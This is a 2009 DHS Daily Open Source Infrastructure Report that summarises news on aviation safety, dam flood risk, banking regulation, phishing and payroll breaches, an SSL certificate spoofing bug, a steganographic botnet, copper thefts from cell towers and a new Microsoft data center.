Department of Homeland Security Daily Open Source Infrastructure Report

Friday, October 2, 2009

Complete DHS Daily Report for October 2, 2009

Daily Report

Top Stories

 A USA Today review found that airline pilots regularly violate federal law by chit-chatting or joking during critical phases of flight — the kind of distractions that may have played a role in two recent fatal crashes that killed a total of 62 people, according to government records. (See item 15)

15. October 1, USA Today – (National) Cockpit chatter cited in six crashes. Airline pilots regularly violate federal law by chit-chatting or joking during critical phases of flight — the kind of distractions that may have played a role in two recent fatal crashes that killed a total of 62 people, according to government records. The National Transportation Safety Board (NTSB) has cited violations of the “sterile cockpit rule” in six crashes since 2004, a USA Today review found. In addition, the pilots of a commuter plane that crashed February 12 near Buffalo were casually talking minutes before the accident that killed 50 people. More than half — 11 out of 20 — of the cockpit recording transcripts released in serious accidents during the past decade contain evidence of violations, USA Today found. Comments that range from mimicking a chicken to expletive-laced jokes were captured on cockpit recordings. Since 1981, federal law has barred such banter while taxiing and flying below 10,000 feet. Pilots need to improve their discipline, according to some safety advocates. “It is sending a signal that following the regulations are not necessary,” said an NTSB board member and former airline pilot. Source:

 According to the Associated Press, the Tennessee Valley Authority will raise the height of four dams in eastern Tennessee with sand-filled containers after a new analysis suggested the dams could be topped by a worst-case flood, the federal utility said Wednesday. (See item 40)

40. October 1, Associated Press – (Tennessee) TVA to raise height of 4 dams over flood concerns. The Tennessee Valley Authority (TVA) will raise the height of four dams in eastern Tennessee with sand-filled containers after a new analysis suggested the dams could be topped by a worst-case flood, the federal utility said Wednesday. TVA officials said such an event is “highly unlikely” and would require a disaster four or five times the size of the worst flood on record in 1857. But they said new hydrology studies prepared to support an operating license for a Bellefonte Nuclear Plant downstream in Alabama suggest the measures are needed. The nation’s largest public utility plans to spend $8 million installing the temporary walls by January at the four dams and to do similar studies at 20 other tributary dams, seven other main channel dams on the Tennessee River and 17 smaller reservoirs over the next year. The temporary walls will be installed atop earthen embankments adjoining the concrete dams at Fort Loudon, Tellico, Cherokee, and Watts Bar lakes. The walls will be 1,400 to 7,000 feet long, depending on the dam, and three to four feet high. TVA calculates that a “probable maximum flood” — defined by regulators as the “most severe flood that can reasonably be predicted to occur at a site” — could overtop those four dams by one to two feet. Such a flood would require a 27-inch rain, twice the amount that caused the floods in Chattanooga and Atlanta last week. Source:


Banking and Finance Sector

11. September 30, Bloomberg – (National) Major U.S. banks’ FDIC premiums may top $10 billion. The Federal Deposit Insurance Corp.’s plan to rebuild its reserves may cost Bank of America Corp. and three of the largest U.S. banks more than $10 billion. Bank of America, the biggest U.S. lender by deposits, may owe $3.5 billion under an FDIC proposal that banks prepay three years of premiums, based on the lowest assessment rate multiplied by the bank’s $900 billion in June 30 U.S. deposits. U.S. bank premiums range from 12 cents per $100 in deposits for the safest lenders to 45 cents for banks the U.S. considers risky, said a senior regulatory counsel for the Independent Community Bankers of America. The FDIC proposed asking banks to pay premiums for the fourth quarter and next three years on Dec. 30. The fees will raise $45 billion. Source:

12. September 30, SCMagazine – (National) Two accused Romanian phishers plead innocent. Two Romanian citizens allegedly involved in a large-scale phishing scam have been extradited to the United States, where they will face fraud and identity theft charges. The men were arrested this year on separate Interpol warrants and were extradited in September, according to a joint statement from the FBI and U.S. Department of Justice. After being extradited, both men pleaded innocent to the charges — one count each of conspiracy to commit fraud in connection with access devices, conspiracy to commit bank fraud and aggravated identity theft. According to prosecutors, the defendants delivered bogus emails to the customers of a number of financial institutions, including JP Morgan Chase, Comerica Bank, Wells Fargo, eBay and PayPal, with the goal of tricking them into giving up their personal information, such as credit card, bank account and Social Security numbers. The investigation stemmed from a complaint filed by a customer of People’s United Bank, based in Connecticut. Source:

13. September 30, Reuters – (National) Lawmaker seeks support for rating agency reform. The chairman of the House Financial Services subcommittee on capital markets is seeking to gain bipartisan support for legislation that would tighten regulation of credit rating agencies, and he hopes for committee action on the bill in the next few weeks. He circulated a draft bill last week that would give the U.S. Securities and Exchange Commission power to dictate how credit rating agencies determine ratings. He said that his subcommittee will meet to discuss and vote on the legislation in the next two to three weeks. The legislation would then move to the full committee for consideration, before it could go before the full House of Representatives for a vote. Earlier on Wednesday, another House panel held a hearing into why the U.S. Securities and Exchange Commission ignored warnings from former Moody’s executives about the company’s weak compliance department and ratings process. The rating firms “played a starring role in the collapse of the financial system last year,” because they failed to capture the true risk of securities linked to poorly written mortgages, said the chairman of the House Oversight and Government Reform Committee. Source:

14. September 30, The Register – (Wyoming) Bank snafu Gmail missive never opened. The confidential email at the heart of a roundabout U.S. lawsuit against Google was never opened, according to the bank that accidentally sent the missive to the wrong Gmail account. This summer, according to court documents, an unnamed employee with the Wyoming-based Rocky Mountain Bank was asked by a customer to send some loan documents to a Gmail account used by a third party. But the employee mistakenly sent them to a different Gmail account, along with another confidential file packed with the names, addresses, tax IDs, and loan info for 1,325 of the bank’s customers. The bank attempted to retrieve the documents, sending additional messages to the account, but did not receive a reply. And when Google rightly refused to release the identity of the person behind the account, the bank sued the web giant in federal court. On September 25, the court issued a temporary restraining order, insisting that Google shut the account down and divulge whether the account was still active and whether the confidential info had been viewed. And if the account was indeed active, Google was also ordered to divulge the user’s identity and contact information. Google complied with the order, but in an email to The Reg, the company declined to say what information was revealed. Repeated calls to a lawyer for the Rocky Mountain Bank went unanswered, but according to a report from CNET News, the bank has said that the confidential message was never opened and that it has now been permanently deleted. Source:

Information Technology

30. October 1, The Register – (International) SSL spoof bug still haunts IE, Safari, Chrome. Nine weeks after a hacker demonstrated how to spoof authentication certificates for virtually any Web site on the Internet, users of Internet Explorer and many other applications remain susceptible because Microsoft has not patched the underlying vulnerability. The bug, which resides in an application programming interface known as CryptoAPI, causes IE and other applications that rely on the code to be tricked by fraudulent secure sockets layer certificates. It can be exploited to impersonate Web sites, virtual private networks, and email servers by adding a null character to the prefix of an address in a legitimate SSL credential. “There are thousands of products on Windows right now that are still vulnerable to this SSL attack, and if someone were to publicly publish a targeted null prefix certificate, they’d be in trouble,” said the white-hat hacker. “Basically, everything that runs on Windows would be vulnerable with that one certificate.” Among the browsers that rely on the Microsoft library to parse SSL certificates are Google Chrome and Apple Safari for Windows. The bug would cause both — and IE as well — to display a fraudulently authenticated Web site with no warning that anything was amiss. The Firefox browser, by contrast, fixed vulnerabilities related to the null character bug a few days after the white-hat hacker presented his demo at the Black Hat security conference in late July. It remains unclear when the bug will be fixed. Source:

31. October 1, The Register – (International) Botnet buries commands in image files. Security researchers have identified a botnet that borrows an idea from steganography by burying commands in jpg images. The DlKhora botnet, which is primarily geared towards downloading other strains of malware, encodes instructions so that the command and control server appears to be serving up image files, SecureWorks reports. The server sets the HTTP Content-Type header to “image/jpeg” and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0x4. The botnet makes no attempt to pad files such that they resemble genuine image files, a factor that marks the servers used by DlKhora out for detection. Malware installed by the botnet agent, as identified by SecureWorks to date, largely consists of ad hijacking nuisances. Hackers need a method for passing instructions to the Trojan of compromised machines that form part of zombie (botnet) networks. IRC channels used to be the preferred venue for command and control channel but recently this has changed with miscreants experimented with different control channels such as Google Groups, Twitter and now “image” servers. Source:

32. September 30, – (International) Symantec: SMBs not fully equipped. There is a large discrepancy between how SMBs perceive their disaster readiness and their actual level of preparedness. That is according to Symantec’s recently released 2009 SMB Disaster Preparedness Study. In a study conducted by Symantec into the attitudes and practices of SMBs and their customers toward technology disaster preparedness, Symantec discovered that the average SMB organization has experienced three network outages within the past 12 months, with the leading causes being virus or hacker attacks, power outages, or natural disasters. It further described the alarming finding that almost half of those companies reported that they do not yet have a plan to deal with such disruptions. The report concluded by offering advice to small to medium businesses to ensure that they are fully protected against the melee of threats and dangers that can befall networks today. Included in the must do list was taking the time to decide what critical information should be secured and protected, engaging trusted industry advisors, implementing automated backup processes, and carrying out annual disaster recovery tests. Symantec says there is positive news to be taken from the responses of the SMBs canvassed. It also came to light in the study that although 47 percent of SMBs do not have a formal disaster preparedness plan, of those without plans, nearly 89 percent say they harbor plans to create one within the next six months. Source:

33. September 30, Washington Post – (National) Hackers breach payroll giant, target customers. Hackers last week apparently used stolen account information from a New Jersey company that provides online payroll services to target the firm’s customers in a scheme to steal passwords and other information. Morrestown, New Jersey-based PayChoice provides direct payroll processing services and licenses its online employee payroll management product to at least 240 other payroll processing firms, serving 125,000 organizations. Last Wednesday, a number of PayChoice customers received an e-mail warning them that they needed to download a Web browser plug-in in order to maintain uninterrupted access to, the portal for PayChoice’s online payroll service. The supposed plug-in was instead malicious software designed to steal the victim’s user names and passwords. In a statement e-mailed to Security Fix, PayChoice said the company discovered on September 23 that its online systems had been breached. The company said it immediately shut down the site and instituted fresh security measures to protect client information, such as requiring users to change their passwords. If successful, PayChoice said, the malicious sites downloaded a Trojan horse program called TrojanDownloader:Win32/Bredolab.X, which according to Microsoft is a malware program that tries to download additional malicious files and disable security software on the infected PC. According to a blogger and security expert who writes the Unixwiz blog and who had several customers who received the malicious e-mails, the malware used in the attack is poorly detected by most anti-virus products on the market today. A PayChoice spokesperson said the company was still investigating the extent of the breach, noting that PayChoice has hired two outside computer forensic experts, and that it is actively working with federal law enforcement investigators. Source:

Communications Sector

34. October 1, Adirondack Daily Enterprise – (New York) Emergency repeater removed from tower. A radio repeater meant to be used in the event of a natural disaster or other emergency is off the air after a contractor working for the village of Saranac Lake removed it from the village’s radio tower on Mount Pisgah. The disaster coordinator for the North Country Chapter of the American Red Cross said he tried to test the emergency repeater about two weeks ago and got no response. The next day the coordinator hiked up Mount Pisgah to see what was wrong with the repeater, which was installed on the tower in 2003. When he reached the top of the mountain, he was surprised to find that “The antenna had been removed and was sitting in the building next to the tower,” he said. The coordinator then contacted village officials and learned that a contractor working for the village had removed two antennas from the tower because no one could determine to whom they belonged. The disaster coordinator said the village apparently did not have a copy of the permit they received to put up the repeater, which is licensed to the American Red Cross Amateur Radio Quick Response Team. But, he said his name, address, and phone number were on the repeater. It is unclear exactly how long the repeater has been off the air. Officials said it was removed sometime in the last couple of weeks. The village is now working with its contractor to try and get the equipment re-installed on the tower. As for the other antenna that was removed from the tower, he said they still have not been able to identify its owner. A structural analysis recently found the Mount Pisgah tower can not support the combined weight of its existing antennas and three proposed antennas, although the village is getting a second opinion. There are currently five antennas on the tower, two of which are used by the Saranac Lake Volunteer Fire Department. The others are used by the Saranac Lake Police Department, Franklin County Emergency Services, and North Country Public Radio, which is the only paying tenant. Source:

35. September 30, Orlando Sentinel – (Florida) More charges added to Volusia’s copper thief suspect. The Volusia County Sheriff’s Office filed more burglary and grand theft charges against a man it said was connected to a second theft of copper at another cell phone tower. A 35 year old man of Port Orange was already under arrest for burglary, grand theft, theft of copper, possession of burglary tools, and violation of probation stemming from a cell phone tower burglary on Sunday, September 27 from a Verizon tower. The most recent copper theft from an AT&T cell phone tower was reported on Monday, although an AT&T representative told law enforcement that the theft at their site happened sometime on Sunday as well. The sheriff’s office said the burglar broke through a fence, cut about 30 feet of copper ground cable, and took a copper ground buss bar. An AT&T representative looked over the copper wire taken from the man during his arrest and told investigators that the copper was AT&T’s. The first tower theft — of a Verizon tower — occurred just before 3 a.m. Sunday just west of Edgewater, the sheriff’s office said. Deputies said the burglar was riding a bicycle away from the tower. He was wearing a mask with a small flash light on the top of it. When they stopped him to talk, they noticed he was sweating and had fresh scrapes and cuts on his shins, the sheriff’s office said. Deputies noticed a large wrench sticking out from his pocket. Then they found pliers, screw drivers, wire cutters, and flashlights. Not much later, they discovered a duffel bag near the gate at the cell tower. The bag was stuffed with about $500 worth of copper wire. Source:,0,2734120.story

36. September 30, CNET – (Illinois) Microsoft opens Windy City data center. On most days it takes the right access badge and a biometric scan to make it inside the doors of Microsoft’s massive data center. But on September 30, the company allowed a group of reporters, customers, and partners to tour the 700,000 square foot facility. The data center, along with another just-opened facility in Dublin, Ireland and existing centers in San Antonio and Quincy, Washington, serve as the guts behind Microsoft’s online ambitions, from Bing to Hotmail to Windows Azure. Microsoft’s Chicago data center offers a merge of old and new techniques. The ground floor features sealed containers with tightly packed racks of servers, while the second floor houses more traditional server rooms. But, for all its strategic import, the ground floor of the Chicago plant looks more like a truck parking lot than a traditional data center. In each parking spot, though, Microsoft can drop off a container packed with up to 2,000 servers. Right now, only about a dozen of the 56 container spots are filled, but Microsoft executives said they expect that to change quickly. The software maker expects to eventually spend up to $500 million filling up the Chicago site with gear. The site was originally slated to open months earlier, but Microsoft delayed things due to the economy. The data center itself is housed in an unmarked warehouse in one of the Chicago area’s many industrial districts. (The software maker did not want the exact location disclosed.) Microsoft picked the spot because of its convenient spot close to cheap and abundant power as well as the fact it sits atop a major Internet connection point that houses major east-west and north-south fiber routes. Source: